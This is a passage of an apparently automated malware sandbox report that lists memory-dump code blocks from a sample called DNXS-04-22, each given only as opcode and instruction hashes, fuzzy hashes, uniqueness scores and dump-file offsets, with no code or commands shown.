                                                                • Opcode ID: 0ce09fadc16ff08d57d23a43561d11ec7039a0e8598af43986d77901c7dbeeb9
                                                                • Instruction ID: 05ec49fed41e34b612c85323341f5582f6777392913426951b9fae7c9d04a79f
                                                                • Opcode Fuzzy Hash: 0ce09fadc16ff08d57d23a43561d11ec7039a0e8598af43986d77901c7dbeeb9
                                                                • Instruction Fuzzy Hash: DAC19174E00218CFDB54DFA9C994B9DBBB2AF89300F1080A9D409AB3A5DB359E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3785339684.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_d00000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e0290b79099fb4dfa3868475162d0b3023e4c4a8fcd9b80916c7d666e7d9e545
                                                                • Instruction ID: baef8af1ff1c0df98ed5b29b33873e857463061af1e90224fc9b9c68836bb57f
                                                                • Opcode Fuzzy Hash: e0290b79099fb4dfa3868475162d0b3023e4c4a8fcd9b80916c7d666e7d9e545
                                                                • Instruction Fuzzy Hash: C5C19174E00218CFDB54DFA9C994B9DBBB2AF89300F1081A9D809AB365DB359E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f084a9b04a8ff1067aadb07f87bfc70d30d332596197bdb3c2116712c9591220
                                                                • Instruction ID: d71416b3b15b6042bd7ce6e785c9ea2c959f16864c3d0ee2755db9df6d7b525d
                                                                • Opcode Fuzzy Hash: f084a9b04a8ff1067aadb07f87bfc70d30d332596197bdb3c2116712c9591220
                                                                • Instruction Fuzzy Hash: 53C18074E00218CFDB54DFA9C994BADBBB2EF89300F1081A9D809AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4522e3c6433a04dc890727e33c566d104be5de7f2aa7931cf6d334cffcf54136
                                                                • Instruction ID: 88d2a43c009c3ad5d02b40cf7da822bf7fe4e71d7e635f8c2c0fa1b7328e25eb
                                                                • Opcode Fuzzy Hash: 4522e3c6433a04dc890727e33c566d104be5de7f2aa7931cf6d334cffcf54136
                                                                • Instruction Fuzzy Hash: 5CC18174E00218CFDB54DFA9C994BADBBB2EF89300F1081A9D409AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a3a22d43e5060405d95354ad12fb7c20858feb852831f3ebfb9d18deebee491
                                                                • Instruction ID: 8922ce99db8ac51cc060ddd4cd7321e17e9daa064aa6c09d09e01d52562efd8b
                                                                • Opcode Fuzzy Hash: 3a3a22d43e5060405d95354ad12fb7c20858feb852831f3ebfb9d18deebee491
                                                                • Instruction Fuzzy Hash: 2BC18F74E00218CFDB54DFA9C994BADBBB2BF89300F1081A9D809AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 64d1dfb8a6e14f648289c75f3b1eb487dafb95d574a37df1c88d35f7ed30c240
                                                                • Instruction ID: ef098a5407f411121fa3b31f31bbe8192ced011c748ce05be669c901609c4aa0
                                                                • Opcode Fuzzy Hash: 64d1dfb8a6e14f648289c75f3b1eb487dafb95d574a37df1c88d35f7ed30c240
                                                                • Instruction Fuzzy Hash: 9BC19274E00218CFDB54DFA9C994BADBBB2BF89300F1081A9D809AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0637c618e05e2b5f34526257d912a65517c006399732e753d65684c4b4879db1
                                                                • Instruction ID: 5ee9c433d7d4061f215581ace8056ea0c34ffd94f3cab54b676648d157860f06
                                                                • Opcode Fuzzy Hash: 0637c618e05e2b5f34526257d912a65517c006399732e753d65684c4b4879db1
                                                                • Instruction Fuzzy Hash: 9CC19074E00218CFDB54DFA9C994BADBBB2BF89300F1081A9D809AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0e77233d0f1e62590091a923440645bd55943516f1f1eace70ff2b32012ec2bc
                                                                • Instruction ID: faff5acf37e541ab808a9ca19d83e4c826ae7370c8d3ecd3303f45c91c9207d6
                                                                • Opcode Fuzzy Hash: 0e77233d0f1e62590091a923440645bd55943516f1f1eace70ff2b32012ec2bc
                                                                • Instruction Fuzzy Hash: 87C19074E00218CFDB54DFA9C994BADBBB2BF89300F1081A9D409AB365DB355E85CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 419cc1976af90688edcb519826fd0eba870da6c7b1da8d91741bc8e316565c61
                                                                • Instruction ID: 980be74f36112ece45c822e8879634e073cc204f5f1af6985daa034906a3d3ef
                                                                • Opcode Fuzzy Hash: 419cc1976af90688edcb519826fd0eba870da6c7b1da8d91741bc8e316565c61
                                                                • Instruction Fuzzy Hash: 25C1B178E00218CFDB54DFA9D984BADBBB2FF89300F1080A9D809AB354DB355A85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 391e1e8b42bf6ca274226b5ab46db1050dd21d3d91078bf094f30d6e845a5f0d
                                                                • Instruction ID: 87bdf8f6f5f67534bc29627a49971eb8cbe00b188416ec2a9400463e27b55f73
                                                                • Opcode Fuzzy Hash: 391e1e8b42bf6ca274226b5ab46db1050dd21d3d91078bf094f30d6e845a5f0d
                                                                • Instruction Fuzzy Hash: 92C18074E00218CFDB54DFA9C994BADBBB2BF89300F2081A9D409AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f2e1f93c75aeebecbeab395c66774e620fdb2a6e5b2e148bf45d17ff2498909f
                                                                • Instruction ID: 54af0b37e5ade8585936a2af086e357a0e416e35148c28cb2848283242340022
                                                                • Opcode Fuzzy Hash: f2e1f93c75aeebecbeab395c66774e620fdb2a6e5b2e148bf45d17ff2498909f
                                                                • Instruction Fuzzy Hash: 07C19074E00218CFDB54DFA9C994BADBBB2EF89300F2081A9D409AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d3eae5a1bf017c49b4ec31dc7e2e7e06bec88d169e1e6729d8d6d44101a3006
                                                                • Instruction ID: 83a788a0c2ffcd3329c0d83b049fe11a3e27e3eae77a45cbd7e0130b7b854a92
                                                                • Opcode Fuzzy Hash: 7d3eae5a1bf017c49b4ec31dc7e2e7e06bec88d169e1e6729d8d6d44101a3006
                                                                • Instruction Fuzzy Hash: 2AC1A178E00218CFDB54DFA9D944BADBBB2FF89301F5480A9D809AB355DB355A81CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 228c80cf779d779e999598322974450f7720918c820d5900db421b1013054255
                                                                • Instruction ID: 70810249fe27284b62030a038cb88fbbe91f8e47c00649aed38ddddbb770edca
                                                                • Opcode Fuzzy Hash: 228c80cf779d779e999598322974450f7720918c820d5900db421b1013054255
                                                                • Instruction Fuzzy Hash: 51C19074E00218CFDB54DFA9C994BADBBB2BF89300F1081A9D809AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d2d7bcab28fe9efd8d5289ad6c5959434bcad41dc01d9e72d37bd10e5643c292
                                                                • Instruction ID: 8f5f5762d0d2c9dddc577d79faecb515f1384ce83d94c1c15334e4be2665bd9c
                                                                • Opcode Fuzzy Hash: d2d7bcab28fe9efd8d5289ad6c5959434bcad41dc01d9e72d37bd10e5643c292
                                                                • Instruction Fuzzy Hash: 9AC19174E00218CFDB54DFA9C994BADBBB2AF89300F1081A9D809AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e69b708eea1d8077fe35bd1dbee6f323bf05296fdd009f5cae5f2b966b89965
                                                                • Instruction ID: ef01eb79ed3b784be08ba47b3a607f4ff64e3c9dcd3faccbb8a3529b429f9cd4
                                                                • Opcode Fuzzy Hash: 2e69b708eea1d8077fe35bd1dbee6f323bf05296fdd009f5cae5f2b966b89965
                                                                • Instruction Fuzzy Hash: C0C1A174E00218CFDB54DFA9D994BADBBB2BF89300F1080A9D409AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a18f5d8e396cf5b7b56efe76fc81f5ac31a0084e878c49e703ebc1f7351a69b
                                                                • Instruction ID: b06002b05248775dedc73c7456a63ec7037ebddc49114fef1989275af8d15067
                                                                • Opcode Fuzzy Hash: 3a18f5d8e396cf5b7b56efe76fc81f5ac31a0084e878c49e703ebc1f7351a69b
                                                                • Instruction Fuzzy Hash: C8C19074E00218CFDB54DFA9C994BADBBB2BF89300F1081A9D809AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f89c29ce636882ed8367d2c0ad86282d41582b5cf6e797f9c043dc314785676c
                                                                • Instruction ID: ddfb9a396ace309da3fa3e7c3ca7f8e5f9aa2a6af2f8aa996797ecb592f6b8c8
                                                                • Opcode Fuzzy Hash: f89c29ce636882ed8367d2c0ad86282d41582b5cf6e797f9c043dc314785676c
                                                                • Instruction Fuzzy Hash: AEC19074E00218CFDB54DFA9C994BADBBB2AF89300F2081A9D409AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f44422634dfcd1f714c1d3f77a95b7ee7760563feda7c782e8e4bcc14fd170c1
                                                                • Instruction ID: 03ba5ed309a9b288944f7a6d1f8c0f65ee2be2bc075578cb168202103f271a35
                                                                • Opcode Fuzzy Hash: f44422634dfcd1f714c1d3f77a95b7ee7760563feda7c782e8e4bcc14fd170c1
                                                                • Instruction Fuzzy Hash: 70C1A178E00218CFDB54DFA9D944BADBBB2FF89300F2080A9D809AB354DB355A85CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4f56934926d8fed564cc7a672c017cc9cb40b5758df07a386627d2b1b685ab26
                                                                • Instruction ID: 303ba7faae38520bf6720190558bb237bd5c17f3eb5b039d908873d902436537
                                                                • Opcode Fuzzy Hash: 4f56934926d8fed564cc7a672c017cc9cb40b5758df07a386627d2b1b685ab26
                                                                • Instruction Fuzzy Hash: F3C18174E00218CFDB54DFA5C994BADBBB2EF89300F2081A9D409AB365DB355E85DF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3785339684.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_d00000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 321c0ad7999a06f0cb6fc4c219ea2a07b4e133f46f92142e28b97d1e32822157
                                                                • Instruction ID: aa33ce5203aa47161b7cce92165855cdd2bf236b08b2d36825fcfd51a092693a
                                                                • Opcode Fuzzy Hash: 321c0ad7999a06f0cb6fc4c219ea2a07b4e133f46f92142e28b97d1e32822157
                                                                • Instruction Fuzzy Hash: D1B18678E00218CFDB54DFA9D994A9DBBB2FF89300F1081A9D819AB365DB309D41CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%